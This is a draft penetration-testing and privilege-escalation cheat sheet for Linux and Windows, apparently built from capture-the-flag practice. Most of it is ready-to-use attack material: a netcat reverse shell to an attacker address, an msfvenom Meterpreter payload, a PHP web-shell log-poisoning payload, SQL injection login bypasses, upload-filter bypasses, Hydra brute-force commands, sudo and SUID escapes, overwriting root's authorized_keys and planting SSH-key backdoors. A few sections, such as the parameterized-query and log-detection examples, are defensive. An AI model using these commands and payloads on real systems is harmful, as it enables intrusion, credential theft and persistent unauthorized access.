
Linux | Windows Privilege Escalation Cheat Sheet (DRAFT) by

The journey of getting root access.

This is a draft cheat sheet. It is a work in progress and is not finished yet.

HTTP Status Codes

Code (Gobuster)
This class of status codes indicates the action requested by the client was received, understood and accepted.
This class of status code indicates the client must take additional action to complete the request.
Client Error
This class of status code is intended for situations in which the error seems to have been caused by the client.
Server Error

Cyber Kill Chain

View Source Code
Read it (enumeration/directory)
Read hints carefully and use the find and locate commands
Dirb buster
Nmap Scan
-A (aggressive) -p- (all ports)
Penetration testing of ftp port.

It can be brute forced using hydra.
ftp <ipaddr> to connect and <get> files.
Think like a hacker
What can I do from here
Where can I look (any hints given)
Common Username/Password
admin:admin admin:admin123 admin:password root:password root:root and admin:fileserver
Web shell
Gives us remote administration on the target server
We can add or modify some data (deface it) as a webadmin. So after we get the web site admin access, our aim is to get web server access.
Information Gathering
Search the website for blog posts with names that can be used. Try to gather information and think about how it can be used
If you need an email address, think about what information can be used to find a name or the address format in use, such as initials@domain_name
Directory Enumeration Wordlists
Dirbuster medium Dirb common rockyou
Steghide and Binwalk
Binwalk is used on png and Steghide is used on jpg
A png image can be used to hide binary files like zip whereas jpg image can be used to hide a text file
Identify hash
hashid 'hash' and ciphey tool
Terminate hashcat session
rm -rf ~/.hashcat/sessions/hash
Nmap script scans
nmap -sV -A --script vuln <ip>
hashcat -a 0 -m 16500 crack.txt /rockyou
HTTP running
dirb try HTTPS//<ip> robots.txt Page source
Wordpress - get reverse shell
Username enumeration Brute force Password Login and upload shell to get session
To upload a PHP shell, either upload it as a PLUGIN or Edit Theme; exploitDB - PHP plugin, MSF - PHP/reverse_tcp and PHP reverse shell can be uploaded
File Upload Bypass & Pentest Monkey Shell
Intercepting the request, playing with it and checking the response is highly important
Collection of Web-Shells
Guides - Hacktricks bypass file upload & Hacker's Grimoire Book
We can use hacktricks: first try out every single extension and then try double extensions. Or use Burp Suite to bruteforce
Bypass File Upload
Download PHP pentest monkey rev shell
rev shell with GIF89a on top
Now change extension
Upload it but won't execute
Now upload again and intercept
Intercept through Burp
Edit the request and change that file to .gif.php
Done just execute the shell through PATH
Use nc to capture the connection
Spot DBus in SUID files
Execute this command to replace current user .ssh private key to root .ssh private key so we can log in over ssh as root
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true
If we get ( ) as reply, it executed system call
dbus is message bus system for usb controller
basically send message of buses from one bus to another
If current user has SUID on DBUS it means that they have executable rights over that command
Bruteforce vhosts / subdomains using FFUF
ffuf -w SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://undiscovered.thm/ -H "Host: FUZZ.undiscovered.thm" -fc 302
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u http://delivery.htb/ -H "Host: FUZZ.delivery.htb" -fw 486
-fw filters by word count. To learn more visit FFUF Fuzzing Filtering
Bruteforcing directory along with extensions
gobuster dir -u <ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 42 -x .bak,.php
Fuzzing vs Bruteforce
Brute forcing is an attack method of just trying all passwords, in a password brute force anyway. Fuzzing is a method of sending malformed or abnormal data to a service in an attempt to get it to misbehave in some way, which could lead to the discovery of vulnerabilities from denial of service, buffer overflows or remote code execution etc. FUZZ can be done for subdomains too, and sending payloads to find LFI or RCE etc.

Cyber Kill Chain (Windows)

Nmap -> Service Enumeration
The services running help us identify our next steps
Kerberos was running on port 88 so we could launch a Kerberos pre authentication attack
If many services are running try enum4linux
Website upload shell and access it
nmap -sV --script=nfs-showmount <target>
Nmap script scan and Nmap scan 2049 (port no)
NFS (mount the drive to access it)
Network File System permits a user on a client machine to mount the shared files or directories over a network.
showmount -e <target>
Mount the content of shared folder -t (type) nfs/iso
mount -t nfs ip:/drive_name /mnt/folder_name
There is a possibility to access the root folder by :/ and then navigate to other folder such as root
There is a way to detach a busy device immediately (umount -l) and then delete the contents
Google where does CMS (umbraco) store credentials
Appdata/.sdf file extension normally contain standard database files that store data in a structured file format.
cat Umbraco.sdf | grep admin
Hashcat to crack password hash
hashcat -a 0 -m 100 crack.hash /usr/share/wordlists/rockyou.txt
Whenever you get interface try to find upload panel
Upload reverse shell then browse the directory to execute it on the remote machine to get a reverse shell
Windows reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.89 LPORT=4455 -f exe > blacklist.exe
Upload it
C:/Inetpub (cve browse to access payload) 'ls C:/'
Inetpub is the folder on a computer that is the default folder for Microsoft Internet Information Services (IIS). The website content and web apps are stored in the inetpub folder, which keeps it organized and secure.
Access the payload
python -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'C:/inetpub/wwwroot/media/1034/blacklist.exe'
Listen for connection
use exploit/multi/handler
set payload payload/windows/x64/shell_reverse_tcp
Upload Winpeas and access using CVE
Privilege Escalation Awesome Scripts
Application area we can see Teamviewer and check it using shell
Use metasploit to gain access to credentials
s run post/windows/gather/credentials/teamviewer_passwords
Evil-Winrm : Winrm Pentesting Framework
PS Remote shell hacking tool named as "Evil-Winrm". So we can say that it could be used in a post-exploitation hacking/pentesting phase.
The purpose of this program is to provide nice and easy-to-use features for hacking.
Evil Winrm
evil-winrm -u Administrator -p '!R3m0te!' -i ''
Enum4linux is an enumeration tool capable of detecting and extracting data from Windows and Linux operating systems, including those that are Samba (SMB) hosts on a network. Enum4linux is capable of discovering the following: Password policies on a target, The operating system of a remote target, Shares on a device (drives and folders), Domain and group membership, User listings
GetNPUUser (impacket script)
getnpuuse <domain_name>/ -dc-ip <ip>
getNPUuse - Get users password hashes, Supported in Kerberos protocol, Disable Kerberos pre-auth it becomes vulnerable, username and password are optional, Use this script to identify vulnerable accounts
Domain Controller , Active Directory
A Windows Domain allows management of large computer networks
They use a Windows server called a DC (domain controller)
A DC is any server that has Active Directory domain services role
DC respond to authentication requests across the domain
DCs have the tool AD (active directory) and GP (group policy)
AD contains objects and OUs (Organizational Units)
GP contains GPOs (Group Policy objects) that manage settings for AD objects
Kerberos Cheatsheet
SMB (netbios-sn)
SMB ports are open. We need to do the usual tasks: check for anonymous login, list shares and check permissions on shares.
SMB enumeration
smbclient -L ip and access smbclient //192.168.1.108/share_name
Notes in Kali
Windows Priv. Esc.

Reverse Shell & Exploi­tation Techniques

Linux privilege cheatsheet
OSCP Cheatsheet
Linpeas, Linenum, Linux exploit suggestor
Linpeas - Hacktricks checklist
SUID command - find / -perm -u=s -type f 2>/dev/null
Sudo -l
Cron jobs cat /etc/crontab
nc -e /bin/sh <ipadd> <port> (target)
nc -lvp <port> (host)
msfconsole | Cheatsheet
use exploit/<path>
specify exploit to use
show options
set the specific options
show target (set target no)
set the specific target like power shell, PHP, python
connect to rdp service using rdp client
start Remmina to access then enter ip address then enter username, domain and password
Linux Privilege Escalation
SUID binary
find / -perm -u=s -type f 2>/dev/null
If you want to escalate privilege to another user, search for files that user owns; there might be a cronjob that executes one of their files, and we can place a reverse shell there
find / -type d -group <user_name> 2>/dev/null
Transfer pspy64 through python server to find cronjobs
Sudo -l
It shows you what exact command you are authorized to use
Suid binary Automation Script
SUID3N Custom binary can be opened by reversing them using Ghidra
Add machine IP to /etc/hosts
echo 10.10.194.183 spookysec.local >> /etc/hosts
Cron Jobs (time-based job scheduler)
Mostly we try to add our reverse shell into the file; the CRON job executes the file and we get the reverse shell
We can even try to change /etc/hosts: if the cron is calling out to that IP we can change it, open a HTTP server on our machine and let it execute the script with our own reverse shell
Exploiting sudo -l
commands - /var/www/gdb as www-data
escalate privilege to a user thirtytwo then
use GTFO sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit
Exploiting sudo -l
(d4rckh) No passwd: /usr/bin/git
We have a user who can exec commands on that path
execute command to escalate
sudo -u d4rckh /usr/bin/git -p help config
Escalate privilege via cronjob of a python script
Exploiting SUID
The find command has the SUID bit set, which means we can run find as the root user, using the -exec flag as shown above. Let's try it out by changing the permission of the root directory.
$ find . -exec chmod 777 /root \;
Su VS Sudo
Su is Permanent privilege escalation (su): It can be used to switch user accounts in the command line mode.
Sudo is Temporary privilege escalation (sudo): Switch the current user to the super user, then execute the command as the super user, and return to the current user directly after the execution is completed.
Privilege escalation 2 ways

Windows cmd commands

Discover users
net user
Read text file
type root.txt
list directory content
Change directory
Read file permission and owner
Right click > Properties > Details > Owner Goto security tab > edit permission > Add > enter the name of user you want to give permission
Upgrade Command Shell to Meterpreter
sessions -u <no> or: use post/multi/manage/shell_to_meterpreter
Metasploit get hashes of users

Linux Directory Structure

Directory Name
When basic priv esc doesn't work, search these directories for Juice
/opt & /var -> www & log & backups. Make sure you review Linpeas properly such as Readable files belonging to root and readable by me but not world readable
/opt is a directory for installing unbundled packages (i.e. packages not part of the Operating System distribution, but provided by an independent source), each one in its own subdirectory.
Sometimes, we can find config files over here, having credentials.
Thus it is an installed software location; another such directory is /usr/local.
/var contains things that are prone to change, such as websites, temporary files, config and databases.
/bin (system commands)
/bin contains executables which are required by the system for emergency repairs, booting, and single user mode.
/usr/bin contains any binaries that aren't required.
/usr/bin (executable commands)
This is the primary directory of executable commands on the system.
Look out for logs, backups, config files

OWASP TOP 10 and others

Vulnerability - along with its mitigation
Hunt down
test' or 1=1; --
' is used to close the query, ; is used to terminate, -- is used to comment out rest
For example ' --, creating a new account blacklist' -- then can alter the query
What happens is there is a query like
UPDATE users set password="new pass" where username="blacklist ' --" and password="this is for current password"
Now when this query runs, everything after -- becomes just a comment which has no effect, and it will directly change the password of the old user
SQL Mitigation
Parameterized Statements: Don't put the input variable directly into the SQL statement; pass it separately
Vulnerable : "Select * From users WHERE email = '" + email + "'";
Sanitizing inputs
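The password-change query described above, run against an in-memory SQLite table: first built by string concatenation, then as a parameterized statement. This is an added example, not code from the original cheat sheet; the table layout, function names and sample accounts are assumptions, and SQL strings use single quotes.

```python
import sqlite3


def make_db():
    """Constructed sample data: a victim account and a look-alike account
    whose *name* contains the quote-and-comment sequence from the text."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("blacklist", "victim-pass"), ("blacklist' --", "attacker-pass")],
    )
    return db


def change_password_vulnerable(db, username, current, new):
    # Input is pasted into the SQL text, so a quote in `username` ends the
    # string literal and `--` comments out the current-password check.
    sql = (
        "UPDATE users SET password='" + new + "' "
        "WHERE username='" + username + "' AND password='" + current + "'"
    )
    return db.execute(sql).rowcount


def change_password_parameterized(db, username, current, new):
    # Values travel separately from the SQL text; the driver never parses
    # them as SQL, so the quote and `--` stay part of the username value.
    cur = db.execute(
        "UPDATE users SET password=? WHERE username=? AND password=?",
        (new, username, current),
    )
    return cur.rowcount


def password_of(db, username):
    row = db.execute(
        "SELECT password FROM users WHERE username=?", (username,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    change_password_vulnerable(db, "blacklist' --", "attacker-pass", "pwned")
    print("concatenated  :", password_of(db, "blacklist"))   # victim row changed

    db = make_db()
    change_password_parameterized(db, "blacklist' --", "attacker-pass", "new-pass")
    print("parameterized :", password_of(db, "blacklist"))   # victim row untouched
```

Passwords are stored in clear text here only to keep the comparison short.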
S3 bucket

Enumer­ation Checklist

Attention to detail
Is something wrong like text at the end
Everything makes sense like password
Lookout for possible usernames, directory, inform­ation
Focus should also be on understanding the application you are enumerating, how it works and what is going on
Connect the Dots like telnet might be running an .exe which is vulnerable to BoF
Starting Enumeration
ifconfig Host discovery : nmap -sn <ip>/24
Explore each service running and grab banners using netcat : nc -nv <ip> <port>
Find whether the service has any version-based vulnerability via google and searchsploit
What do we have and what can be done ? like we might have a directory already which can be further /-FUZZ-
Pentest <service> hacktricks / hackingarticles
HTTP / HTTPS 80 & 443
https; robots.txt; /* source code review; directory enum; vulnerability like LFI, SQL. Every vulnerability has its indicators; extension check; double /-FUZZ- on paths and parameters
Play with Burp requests to understand application flow && play with headers; x-forwarded-for can be used to bypass rate limit or IP ban
More Port 80 / HTTPS checklist
Is it a CMS; Nikto for web vulnerability scanning; discover if website is /index.php or /index.html; Id in URL - FUZZING can lead to dir. traversal or LFI; if given domain name try bruteforce subdomains / vhosts; Wildguess : If there are 2 http ports open, one service might impact other, or leak information.
Login Form : Hunt for username, brute-force, SQL injection bypass on both User & Pass Parameter = admin' OR '1'='1;--+
Anonymous login; brute force; CVE; cd...; dir: use it, it returns a full directory listing whereas ls -al returns a hidden and simplified directory listing. Google the version for exploits or vulnerability
PUT command files on the server and http server to trigger. After login, which directory are you currently in, are the files owned by root? Try cd ..
Hunt for admin panel; Login Panel - default creds for that service & small brute-force for common creds test; aim for usernames and passwords; always read source, https, robots and dirb
Always study that CMS like upload path and other important directory names
FUZZ for subdomains via ffuf; hunt CMS version & search for exploit / vulnerability for that version
Directory Enumeration
gobuster dir -u http:// -w /usr/share/wordlists/raft-large-directories-lowercase.txt -t 40 -x php,bak,txt
Always use raft and 2.3 medium wordlist for bruteforce. Remember to specify extension check.
/example/{{fuzz}} : Remember to FUZZ double/directory too.
Service Enumeration
Enumerate the service
Find login page like directory path for that service
like where is the login page located
Checkout Youtube and others for exploiting that service
Enumeration tip
After getting a shell as www-data always check /var/www and save the current user's private key /home/paul/.ssh/id_rsa; we might be able to log in as another user directly
HTTP Directory Enumeration
3 Wordlists - common.txt, dirbuster/directory-list-2.3-medium.txt, seclists/raft-large-directories-lowercase.txt
dirsearch -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e * -t 50
Database Penetration Testing (SqlMap)
Always look out for an id in the URL, which might be using a database and be vulnerable to SQL. sqlmap -u "http://:8080/mercuryfacts/1" --dbs --batch
Enumerate login forms, id value, parameters for SQL vulnerability via burp request or sqlmap
Upgrading a Simple Shell to Fully Interactive (TTY)
python -c 'import pty; pty.spawn("/bin/sh")'
Enumeration Scripts
LinEnum, Linpeas, LES , pspy64 or pspy32
Linux exploit suggestor
Netstat on the victim machine
To view incoming and outgoing connections; might find a port not coming up in the scan
netstat -tulpn
Sqlmap to perform enumeration (Banner Grabbing)
Capture burp request and test it on Login forms
Command: sqlmap -r .txt file_name --dbs
SQL - important files (hacktricks), cleartext .mysql_history in /home dir
Cipher Identifier and Analyzer
Password Hash Cracker
Vigenere cipher (Long text vulnerable)
All in one Decoder
Cipher and Hash identification
HEX 41 42
Decimal and Binary
Base64 number and upper and lower case
MD5 lower case numbers and 32 in length
Find files with common extension
find / -name '*.txt' 2>/dev/null
The crypt formats all have a prefix
$1$ is md5crypt, $2$ is bcrypt, $5$ is sha256crypt, $6$ is sha512crypt
Ciphey tool and hashcat wiki
Etc/Shadow File
Understanding the /etc/shadow File
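An added example (not from the original cheat sheet) that applies the prefix list above to shadow-format lines and flags the accounts a defender would want to rehash or lock. The sample lines and hash values are constructed, and the $2a$/$2b$/$2y$ bcrypt variants are included beyond the page's list.

```python
# Prefix -> scheme, from the list above plus the common bcrypt variants.
SCHEMES = {
    "1": "md5crypt",
    "2": "bcrypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
}

# Classifications that should produce an audit finding.
FLAGGED = {
    "md5crypt": "weak hash scheme",
    "des-or-unknown": "legacy or unrecognised hash format",
    "empty": "no password set",
}

# Constructed sample in /etc/shadow layout; the hash strings are fake.
SAMPLE_SHADOW = """
root:$6$Xy1saltsalt$FAKEHASHFAKEHASH:19000:0:99999:7:::
daemon:*:18000:0:99999:7:::
legacy:$1$abcd1234$FAKEHASHFAKEHASH:17000:0:99999:7:::
svc:$5$rounds=5000$saltsalt$FAKEHASH:19000:0:99999:7:::
web:$2b$12$FAKESALTFAKEHASH:19000:0:99999:7:::
guest::19000:0:99999:7:::
old:FAKEDESHASH12:15000:0:99999:7:::
""".strip()


def classify(field):
    """Name the scheme used by the second field of a shadow entry."""
    if field == "":
        return "empty"                  # account can log in without a password
    if field[0] in "!*":
        return "locked"                 # password login disabled
    if field.startswith("$"):
        parts = field.split("$")        # "$6$salt$hash" -> ["", "6", "salt", "hash"]
        if len(parts) >= 4:
            return SCHEMES.get(parts[1], "unknown-prefix")
        return "malformed"
    return "des-or-unknown"             # no $id$ prefix at all


def audit_shadow(text):
    """Return (user, scheme, finding) for every entry; finding is None if fine."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        scheme = classify(fields[1])
        rows.append((fields[0], scheme, FLAGGED.get(scheme)))
    return rows


def weak_accounts(text):
    """Usernames whose entry produced a finding."""
    return [user for user, _, finding in audit_shadow(text) if finding]


if __name__ == "__main__":
    for user, scheme, finding in audit_shadow(SAMPLE_SHADOW):
        print(f"{user:8} {scheme:16} {finding or 'ok'}")
```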
THM Cryptography Room - RSA tool
PGP stands for Pretty Good Privacy. It's software that implements encryption for encrypting files, performing digital signing and more. Similarly we have the open source GPG, and you can decrypt a file using gpg
Another tip for service enum
Most privilege escalation to users after www-data is through a hash or some given pass; enumerate the files of that service, like where the database files are stored inside this service or where the users' info is stored in that service
Copy all files into a single file
cat * > blacklist.txt
LFI / RFI Final Cheat sheet, Detailed Attack Vectors
File Inclusion / Directory traversal
Payload all the Things
File Inclusions Attacks
To expand, in an RFI attack, a hacker employs a script to include a remotely hosted file on the webserver. In an LFI attack, a hacker uses local files to execute a malicious script. For LFI, it is possible for a hacker to only use a web browser to carry out the attack.
On the other hand, Local File Inclusion (LFI) is very much similar to RFI. The only difference is that in LFI, in order to carry out the attack, instead of including remote files the attacker has to use local files, i.e. only files on the current server can be used to execute a malicious script. Since this form of vulnerability can be exploited using only a web browser, LFI can easily lead to remote code execution by including a file containing attacker-controlled data such as the web server's access logs, as in log poisoning

Remote File Inclusion (RFI) is a method that allows an attacker to employ a script to include a remotely hosted file on the webserver. The vulnerability promoting RFI is largely found on websites running on PHP. This is because PHP supports the ability to 'include' or 'require' additional files within a script. The use of unvalidated user-supplied input within these scripts generally leads to the exploitation of this vulnerability.
LFI local file inclusion
If you find parameter /p?plot=
Try Fuzzing manually or Burp. LFI (local file inclusion) is a vulnerability which an attacker can exploit to include/read files.
Therefore, whenever you see a PHP website try FUZZING as these are sometimes vulnerable to LFI or RFI + Use Directory Traversal
LFI vulnerability
Log Poisoning is a common technique used to gain a reverse shell from a LFI vulnerability. To make it work an attacker attempts to inject malicious input to the server log.
Add the "?page=" parameter and let's try reading the apache log file. The log file is located at the following path: /var/log/apache2/access.log
Fire up Burpsuite and intercept the request and insert the following malicious code in the user agent field (The PHP command will allow us to execute system commands by parsing the input to a GET parameter called lfi)
The link becomes: http://<IP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi= Now you can execute commands on the system!
Log poisoning attack vector through LFI is possible using Directory traversal and other ways like SMTP
Forward the request and add your parameter to the link (in my case lfi).
User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/68.0
p?page=/var/log/apache2/access.log&lfi=cd /home;cd lfi/;cat flag.txt;ls -lap;uname -r;ls -la
RFI/LFI (by specifying path we can even read user and root flag if server is running with root permissions)
Look out for parameters. To put it another way, the page we're looking at is actually empty; however, it's including content from another page
Local File Inclusions are when that input isn't properly sanitised, allowing us to manipulate the link to open other files. Or in case of RFI we can supply an external URL and gain Shell
In this example, the malicious file is included and run with the privileges of the user who runs the web application. That allows an attacker to run any code they want on the web server. They can even gain a persistent presence on the web server.
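Detection logic for the log poisoning pattern described above, run over constructed Apache combined-format log lines: it flags PHP tags in request headers and parameters that point at log files or use traversal. This is an added example, not part of the original cheat sheet; the rule names and sample addresses are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format: ip, identity, user, time, request,
# status, size, referer, user agent.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
CODE_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)      # PHP open tags
LOG_PATH = re.compile(r"(^|/)var/log/|\.log$", re.IGNORECASE)

# Constructed sample lines (documentation address ranges).
SAMPLE_LOG = """
203.0.113.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 Firefox/68.0"
198.51.100.9 - - [12/Mar/2024:10:02:10 +0000] "GET /lfi/lfi.php?page=home HTTP/1.1" 200 300 "-" "Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/68.0"
198.51.100.9 - - [12/Mar/2024:10:02:31 +0000] "GET /lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls HTTP/1.1" 200 9000 "-" "Mozilla/5.0 Firefox/68.0"
203.0.113.7 - - [12/Mar/2024:10:05:00 +0000] "GET /lfi/lfi.php?page=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1500 "-" "Mozilla/5.0 Firefox/68.0"
""".strip()


def findings_for(line):
    """Return (ip, reasons) for one log line, or None if it does not parse."""
    match = LINE.match(line.strip())
    if not match:
        return None
    reasons = []
    # Stage 1 of log poisoning: code written into a logged header.
    if CODE_TAG.search(match["agent"]) or CODE_TAG.search(match["referer"]):
        reasons.append("php-tag-in-header")
    # Stage 2: a parameter makes the application include the log file,
    # or walks out of the web root. parse_qsl percent-decodes the values.
    query = urlsplit(match["target"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if LOG_PATH.search(value):
            reasons.append(f"log-file-in-param:{name}")
        elif "../" in value or "..\\" in value:
            reasons.append(f"traversal-in-param:{name}")
    return match["ip"], reasons


def scan(text):
    """Return (line_number, ip, reasons) for every suspicious line."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        parsed = findings_for(line)
        if parsed and parsed[1]:
            hits.append((number, parsed[0], parsed[1]))
    return hits


if __name__ == "__main__":
    for number, ip, reasons in scan(SAMPLE_LOG):
        print(number, ip, ", ".join(reasons))
```

A PHP tag in a header followed by a log path in a parameter from the same address is the two-step sequence the text describes, so correlating hits by IP is a natural next rule.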
Exploit SUID & Backdoor
PATH of SUID binary and GTFO command together to gain root access
ssh-keygen .ssh/auth-keys Leaving an SSH key in authorized_keys on a box can be a useful backdoor
Hash-id & Crack Hash online otherwise use hashcat or JTR
Hydra crack login page
Provide the full path, mostly like /index.php, otherwise it won't work
When providing path test /index.php to identify PHP is running
hydra 10.10.10.227 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form '/admin/index.php:user=admin&pass=^PASS^:Username or password invalid' -f
Sudo gives you permission to execute Scripts
Remove that script and replace with a shell
Brute force after you get usernames or password list hint
hydra, if you get usernames
Port Knocking : If you see numbers as hint might be port knocking
Knock on the ports mentioned to open hidden ports
for x in 1 3 5; do nmap -Pn --max-retries 0 -p $x 10.10.63.86; done
nmap -r -p1,3,5 10.10.17.17
SQL & XSS Indicators
For XSS, target Text boxes and URL, XSS might also get triggered on another page, For SQL test URL like Id or login pages.
Runs on Port 25, Nmap has scripts like --script smtp-commands && google search with hacktricks and hackingarticles for possible enumeration techniques
Understand the difference
139 & 445 SMB , for more refer hacktricks
Check null session, Shares list , Enum4linux
enum4linux -a
Smbclient -L <ip> to list shares && -N to force without password && smbclient //<ip>/<share-name>
Enumeration and Understanding of the scenario are very important aspects.
Think if you need something like credentials is there any way to access them from current options available.

Linux Commands

Command Name
Vim Text Editor
i for insert esc to exit insert :wq to quit and save :%d delete all lines
Hashcat (crack password hash)
hashcat -a 0 -m 500 hash /root/Downloads/rockyou.txt --force
Transfer Files via Nc & Base64 (move files)

On Victim : nc -nv 5555 < access.exe
On Attacker : nc -nlvp 5555 > access.exe
base64 <filename>
Save the encoding in a file
base64 -d <filename_base64_encoding>
Scp (secure copy files)
Want to receive files from target
scp username@remote:/file/to/send /where/to/put
Gobuster (dir buster)
gobuster dir -u -w /usr/share/wordlists/dirb/common.txt
Processes running (under which user)
ps aux
SUID (set owner userId upon execution) binary
find / -perm -u=s -type f 2>/dev/null
Instead of rwx -> rws. Example - the suid bit is set on the binary file password, as other users should be able to change their password but the user won't have direct access to that file
So it has root privileges
Burp Suite (check acceptable file ext)
By sending the request to Intruder and then a spider attack. Check the response length to verify if the extension is acceptable or not
A Python script importing the requests library can also be used
Word count (count the no of lines in a file)
wc -l yourTextFile
whatweb <ip>
The WhatWeb tool is used to identify different web technologies used by the website.
Fim (view images from terminal)
fim <image_name>
Curl (change user agent (browser type render content) and follow redirection)
curl -A "J" -L "http://10.10.231.116"
Python server to transfer files from remote to local
python3 -m http.server <port_no> and access using the ip of remote machine:port no
Python server to transfer files from local to remote
wget http://<ur-ip>:<port>/<file>
Extract zip
7z e <zip_name.zip>
Crack Zip
locate zip2john
zip2john <zipfile> > output.txt
john output.txt
fcrackzip -u backup -D -p /usr/share/wordlists/rockyou.txt -v
Move multiple to directory
mv file1 file2 folder_name
Fuzz directory
wfuzz -c -w common.txt --sc 200 -u "http://1/FUZZ.txt" -t 100
wfuzz -z file,big.txt -d "breed=FUZZ" -u http://shibes.xyz/api.php
Find flags .txt
find / -type f -name 'user.txt' 2>/dev/null
Hydra (brute force http post form)
hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form "/dvwa/lop:username=^USER^&password=^PASS^&Login=Login:Login Failed"
Specify the error at login failed
Hydra (brute force FTP)
hydra -l ftpuser -P passlist ftp://10.10.50.55
FTP bruteforce
hydra -l chris -P /usr/share/wordlists/rockyou.txt -vV ftp://10.10.91.104
POP3 bruteforce
hydra -l "boris" -P /usr/share/wordlists/fasttrack.txt -f 10.10.186.225 -s 55007 pop3 -V
John the ripper (crack ssh) VIA (private key pass bruteforce)
python /usr/share/john/ssh2j codes > crack.txt
john --wordlist=/root/Downloads/rockyou.txt crack.txt
ssh (login through private key)
ssh -i codes david@10.10.10.165 -p 22
SSH bruteforce for password
hydra -f -l john -P list ssh://10.10.24.200
Bruteforce JPG for hidden data (steghide pass)
stegcracker file list.txt
TELNET interacting with POP3
Connect to the mail server using Telnet with the IP or DNS name of the server on port 110
TELNET commands
PNG magic number & Hexedit
89 50 4E 47 0D 0A 1A 0A
hexedit <file>
hexedit ctrl+x - to save
Mysql cheatsheet
MySQL Commands
Use ; to terminate the mysql line
Find a specific file with readable permission
find / -type f -readable 2>/dev/null | grep README.txt
Sudo -l execution
(sly) /bin/cat /home/sly/README.txt
sudo -u sly /bin/cat /home/sly/README.txt
So you can see the user was able to execute that command. We have to use sudo and specify <usr> <binary path> <file> to execute
Nmap scanning working
If you run nmap -sC -sV -Pn ip you can see the result; if you specifically add -p 1-100, it will show their info, because they are all open
To only grab banners
nmap -p 1-100 <IP> --script banner
Telnet is a communication tool; it gets the banner or the protocol info: if it's http, it shows http info, if it is ssh, it shows ssh rsa info
Escape shells via progra­mming


Vim Text Editor
Service Exploitation
Exploiting any service which is running as root
Also provide the file path to the service's executable
To exploit a service
Execute it for example <path_to_the_service>->
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
You can get this from GTFObins but need to find out path
/systemctl (suid bit set)
service is a "high-level" command used to start, restart, stop and check the status of services in different Unixes and Linuxes.
Service is adequate for basic service management, while directly calling systemctl gives greater control options.
Our target system allows any logged in user to create a system service and run it as root!
Sudo -l
sudo -l shows you what exact command you are authorized to use
(ALL, !root) NOPASSWD: /usr/bin/vi
The !root is a cve vulnerability which can be exploited through
sudo -u#-1 <path_where_user_can_execute_sudo_command>
If sudo -l specifies Vim
Use esc and then :! as we are going to type a system command and then we specify executable sh (:!sh)
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

The project collects legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.

Windows Enumer­ation

Biggest Enumer­ation Hint
This is going to sound disingenuous, but you need to learn how to figure things out. Each machine might require a tool you haven't even heard of yet, but you have to figure that part out. Knowing what and how to Google is arguably the most valuable skill.
Hint - Users
Names are important! Might be a subdomain, or read and understand, might be a username or passwd
Hint - Finding the right file
The service at the start of the box can be checked later on for a conf or other file with username passwd
Github - working
Create branch; now push file into that branch; click on the uploaded file and PULL request; complete pull request is same as Commit; approve and complete the merge
Active Directory
TryHackMe Room. A Windows Domain allows management of large computer networks. They use a Windows server called a DC (domain controller). A DC is any server that has Active Directory domain services role. DC respond to authentication requests across the domain. DCs have the tool AD (active directory) and GP (group policy). AD contains objects and OUs (Organizational Units). GP contains GPOs (Group Policy objects) that manage settings for AD objects
Netbios port 137
Hacktrick enumeration
SMB port 139
smbclient -L <ip> - yields information such as sharename and its type
SVN PORT NO - 3690 and it's simply Version Tracking With Subversion (SVN)
First view the log svn log svn://worker.htb/
Now you can view the difference between those commits svn diff svn://htb/ -r 2
Subversion Commands
Subversion cannot find a proper .svn directory in there.
Reverse shells
Powershell reverse shell
